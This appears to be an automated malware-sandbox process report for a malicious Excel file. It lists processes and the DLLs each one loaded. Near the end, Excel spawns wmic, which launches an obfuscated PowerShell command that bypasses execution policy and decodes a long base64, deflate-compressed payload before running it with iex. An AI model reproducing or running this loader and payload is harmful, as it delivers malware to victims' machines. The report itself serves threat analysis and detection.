c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5396
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
4128
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5680
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5724
CMD
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ab1q55zd.cmdline"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.7.2556.0 built by: NET471REL1
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\microsoft.net\framework64\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscorpehost.dll

PID
4200
CMD
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESBA2B.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1C0F2C3A60AA4450AD6729B2777C95DE.TMP"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52519.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\bcryptprimitives.dll

PID
2736
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.11328.20158
Modules
Image
c:\program files\microsoft office\root\office16\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\wtsapi32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\d2d1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winsta.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\d3d10warp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\dwrite.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\windows.system.profile.retailinfo.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\sppc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\cabinet.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\propsys.dll
c:\windows\system32\mpr.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msiso.dll
c:\windows\system32\coml2.dll
c:\windows\system32\explorerframe.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\slc.dll
c:\windows\system32\srpapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\uiautomationcore.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\windows\system32\sxs.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\dcomp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\wintrust.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\usp10.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\globinputhost.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeuires.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbeuiintl.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cscapi.dll
c:\program files\microsoft office\root\vfs\system\fm20.dll
c:\program files\microsoft office\root\vfs\system\fm20enu.dll
c:\program files\microsoft office\root\vfs\system\mscomctl.ocx
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.431_none_887985224abb0026\comctl32.dll
c:\program files\microsoft office\root\office16\msoarianext.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\wininet.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dpapi.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5800
CMD
wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX"
Path
C:\WINDOWS\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shcore.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msiso.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoxmlmf.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll

PID
5840
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
wMIc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll

PID
2504
CMD
POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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